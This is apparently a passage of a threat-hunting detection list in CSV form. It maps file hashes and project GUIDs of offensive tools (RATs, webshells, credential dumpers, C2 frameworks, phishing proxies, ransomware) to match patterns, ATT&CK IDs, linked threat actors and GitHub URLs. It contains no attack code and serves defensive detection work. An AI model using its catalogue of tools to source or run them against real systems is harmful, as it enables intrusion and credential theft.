"*d506b46fbd63aebc7150015eefac40aad4d278e9b8b8e84f45e63356267bf7ab*",".{0,1000}d506b46fbd63aebc7150015eefac40aad4d278e9b8b8e84f45e63356267bf7ab.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39707"
"*d5092358-f3ab-4712-9c7f-d9ec4390193c*",".{0,1000}d5092358\-f3ab\-4712\-9c7f\-d9ec4390193c.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","#GUIDproject","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","39708"
"*d5166ef63bf4d35ede9f2b3649e92406f045bbbf317104f47f9a134f70ecd536*",".{0,1000}d5166ef63bf4d35ede9f2b3649e92406f045bbbf317104f47f9a134f70ecd536.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","39710"
"*d51cc14376f771812ed23ed381377da238dea6f9f768d767c8608bc03c1ff0a4*",".{0,1000}d51cc14376f771812ed23ed381377da238dea6f9f768d767c8608bc03c1ff0a4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39712"
"*D52008450F6AD0DBB4C8E5596B97A322DAC76CC6A59C9D0CB1AF26D09CC2E013*",".{0,1000}D52008450F6AD0DBB4C8E5596B97A322DAC76CC6A59C9D0CB1AF26D09CC2E013.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","39713"
"*D52AB3F8-15D3-49C5-9EAC-468CDF65FB22*",".{0,1000}D52AB3F8\-15D3\-49C5\-9EAC\-468CDF65FB22.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39716"
"*d52d17134711fdf76b9ce6da73e8be0616ae49ff3c07516accb3ef2693572240*",".{0,1000}d52d17134711fdf76b9ce6da73e8be0616ae49ff3c07516accb3ef2693572240.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39717"
"*d533a9a5a4b19deed391457a2194f896560cd4fc021341750071389b6042bc23*",".{0,1000}d533a9a5a4b19deed391457a2194f896560cd4fc021341750071389b6042bc23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39719"
"*d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7*",".{0,1000}d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","#filehash","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","39720"
"*d546105ee91da0a53a26ed53f90414ea5f56a272caa137629125d018354f6b77*",".{0,1000}d546105ee91da0a53a26ed53f90414ea5f56a272caa137629125d018354f6b77.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","39721"
"*d547b2cb061f4bb9110e3fb3417ce310ca8abc47f71c9dfb5fa6c1c17373b9ef*",".{0,1000}d547b2cb061f4bb9110e3fb3417ce310ca8abc47f71c9dfb5fa6c1c17373b9ef.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39722"
"*d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a*",".{0,1000}d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","39723"
"*d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a*",".{0,1000}d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39724"
"*d54c329f98f7efcd433ab2813d2be5a6b1454dc7faaa006c239551f08cf2527c*",".{0,1000}d54c329f98f7efcd433ab2813d2be5a6b1454dc7faaa006c239551f08cf2527c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39725"
"*d556dc4b57faf4f138956434499e48b52cc97aa6921dcec3d84d04c0e0601d38*",".{0,1000}d556dc4b57faf4f138956434499e48b52cc97aa6921dcec3d84d04c0e0601d38.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39727"
"*d5591f81fb5bd90d3af0954008ecfd433eeaf6ecc99941324747ca7433ae5985*",".{0,1000}d5591f81fb5bd90d3af0954008ecfd433eeaf6ecc99941324747ca7433ae5985.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","39728"
"*d55db7d82a8a8f375172b9a7e2a1cc01d4a7401266e6ec2ae1c6e179c2cf32ac*",".{0,1000}d55db7d82a8a8f375172b9a7e2a1cc01d4a7401266e6ec2ae1c6e179c2cf32ac.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","39729"
"*d561756dd8152cceb60d50ae5650eedcdb022f306f193017aede737428ff2452*",".{0,1000}d561756dd8152cceb60d50ae5650eedcdb022f306f193017aede737428ff2452.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","39730"
"*d56d56e534a399f0130e77ee424fc4c0c81e296a9c3a3560a97500a970119c1a*",".{0,1000}d56d56e534a399f0130e77ee424fc4c0c81e296a9c3a3560a97500a970119c1a.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","39732"
"*d56e0de10ba38b39604171a2cfb22ff4cd6dffcd5f7646fb01a1715d39c522b6*",".{0,1000}d56e0de10ba38b39604171a2cfb22ff4cd6dffcd5f7646fb01a1715d39c522b6.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","39733"
"*d572fb79014f9b3a6595a71f37eb4bb3a34ecec79c62ef053a70f4b47ba13411*",".{0,1000}d572fb79014f9b3a6595a71f37eb4bb3a34ecec79c62ef053a70f4b47ba13411.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39734"
"*d5743f7c28385bcb3b4a07eabd2a49a3791f5b0a929b60c50700cadac1451da8*",".{0,1000}d5743f7c28385bcb3b4a07eabd2a49a3791f5b0a929b60c50700cadac1451da8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39736"
"*d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061*",".{0,1000}d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39738"
"*d57894d047c6589b7baf7d8745523fe56197a09ffd33e5f577227c2c5a5a7adc*",".{0,1000}d57894d047c6589b7baf7d8745523fe56197a09ffd33e5f577227c2c5a5a7adc.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#filehash","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","39739"
"*d57cbbc5b6f0d223b5a3470a6a444ea4ef49dad718cbe992c92cca935cfdac7d*",".{0,1000}d57cbbc5b6f0d223b5a3470a6a444ea4ef49dad718cbe992c92cca935cfdac7d.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","39742"
"*d57d2b2a2a345eaef9c6b06bb8cfb2ce2578b775cdc5deacfcada080db784f33*",".{0,1000}d57d2b2a2a345eaef9c6b06bb8cfb2ce2578b775cdc5deacfcada080db784f33.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39743"
"*d57fb832ba62ad32cefe4f98fe504d503d85b429306780c63ac8a6ffc7af6cb6*",".{0,1000}d57fb832ba62ad32cefe4f98fe504d503d85b429306780c63ac8a6ffc7af6cb6.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39745"
"*d5832804b0ca494327375e299c908a2d12b39053fa3cd1273f1899125e467557*",".{0,1000}d5832804b0ca494327375e299c908a2d12b39053fa3cd1273f1899125e467557.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39746"
"*d583e8ee91ab53e8c797b3beb22bfb8b9e775f88436798225e2ec361832a8942*",".{0,1000}d583e8ee91ab53e8c797b3beb22bfb8b9e775f88436798225e2ec361832a8942.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","39747"
"*D5865774-CD82-4CCE-A3F1-7F2C4639301B*",".{0,1000}D5865774\-CD82\-4CCE\-A3F1\-7F2C4639301B.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#GUIDproject","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","39748"
"*d5930d27f2cb09241e6d7761b334762e738f8d6937a0bf23df1a3f453d2bb4bd*",".{0,1000}d5930d27f2cb09241e6d7761b334762e738f8d6937a0bf23df1a3f453d2bb4bd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39749"
"*d5aa5ef1208264ae918f0e285d358189f66d1166093657f0240a762220bd6a74*",".{0,1000}d5aa5ef1208264ae918f0e285d358189f66d1166093657f0240a762220bd6a74.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","39754"
"*d5ad2fca7e56448f82eb0da69d8578abf2acce9616d9849622ccd17655f73285*",".{0,1000}d5ad2fca7e56448f82eb0da69d8578abf2acce9616d9849622ccd17655f73285.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","39755"
"*d5b211c3a68fdd0231c3f6aa72dc980b8481e47fca6ce40605021d3e6222d7c5*",".{0,1000}d5b211c3a68fdd0231c3f6aa72dc980b8481e47fca6ce40605021d3e6222d7c5.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","39756"
"*D5C4F5A2-5713-4A0A-A833-F9466AE5A339*",".{0,1000}D5C4F5A2\-5713\-4A0A\-A833\-F9466AE5A339.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","39758"
"*d5c698b9cd57ec7571c3579601ebaa9f74167f767f13c716f5b72fed3f37cb67*",".{0,1000}d5c698b9cd57ec7571c3579601ebaa9f74167f767f13c716f5b72fed3f37cb67.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39759"
"*d5c8e759b790c6ffb3134c8f0aae5865e2ae4c672dc09eaa312bc928fd0d78bd*",".{0,1000}d5c8e759b790c6ffb3134c8f0aae5865e2ae4c672dc09eaa312bc928fd0d78bd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39761"
"*d5cd8e3db9434a439d26e9e870abfa4e4b45bb502e61878966ba3e90c0c1cfd3*",".{0,1000}d5cd8e3db9434a439d26e9e870abfa4e4b45bb502e61878966ba3e90c0c1cfd3.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","39763"
"*d5d6d92f2c1c606b8717b9ed1027b806adfdb8f7eb32eadbb122b5f8094edaad*",".{0,1000}d5d6d92f2c1c606b8717b9ed1027b806adfdb8f7eb32eadbb122b5f8094edaad.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","39765"
"*d5dff22f4db5a503538b01476f60d8e0fc9f203259866eeb96b551fb2271cf65*",".{0,1000}d5dff22f4db5a503538b01476f60d8e0fc9f203259866eeb96b551fb2271cf65.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","39766"
"*d5f0032f2d09939afd7f054530076eefe4cdaca9a625197d12f3f13a92e884d0*",".{0,1000}d5f0032f2d09939afd7f054530076eefe4cdaca9a625197d12f3f13a92e884d0.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","39769"
"*d5fb8f91ffff93aecf6c68f864ce853a541d0bb7b53db3f5eb2fd6b8310cc5f2*",".{0,1000}d5fb8f91ffff93aecf6c68f864ce853a541d0bb7b53db3f5eb2fd6b8310cc5f2.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#filehash","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","39772"
"*d603e7a5f7a44b5a07ab148df8032562a5847a1af7f4f66855d42e550c638d76*",".{0,1000}d603e7a5f7a44b5a07ab148df8032562a5847a1af7f4f66855d42e550c638d76.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39773"
"*D60C351E1207F7C344C467BB09EC1EEA33D283C34FA56A531222871BB2542CE4*",".{0,1000}D60C351E1207F7C344C467BB09EC1EEA33D283C34FA56A531222871BB2542CE4.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","39774"
"*d60cd24ca6f3a3d684dbaa018525676e0b9829ed3c10a04c4fbd728747c38b75*",".{0,1000}d60cd24ca6f3a3d684dbaa018525676e0b9829ed3c10a04c4fbd728747c38b75.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39775"
"*d617ba8cc034438b50e1b4afbe5ae7baa244176f01e67d6be160d1e5428537e2*",".{0,1000}d617ba8cc034438b50e1b4afbe5ae7baa244176f01e67d6be160d1e5428537e2.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","39776"
"*d61c96edd06b7166d5c48c0941f1060c19a0342a6e9b8cb6844fe823fb5d1a58*",".{0,1000}d61c96edd06b7166d5c48c0941f1060c19a0342a6e9b8cb6844fe823fb5d1a58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39777"
"*d61ec93dd0760f68a6b98f8dd073fcbbe7edeb55cbd3281f12df0af42ce6f794*",".{0,1000}d61ec93dd0760f68a6b98f8dd073fcbbe7edeb55cbd3281f12df0af42ce6f794.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","39778"
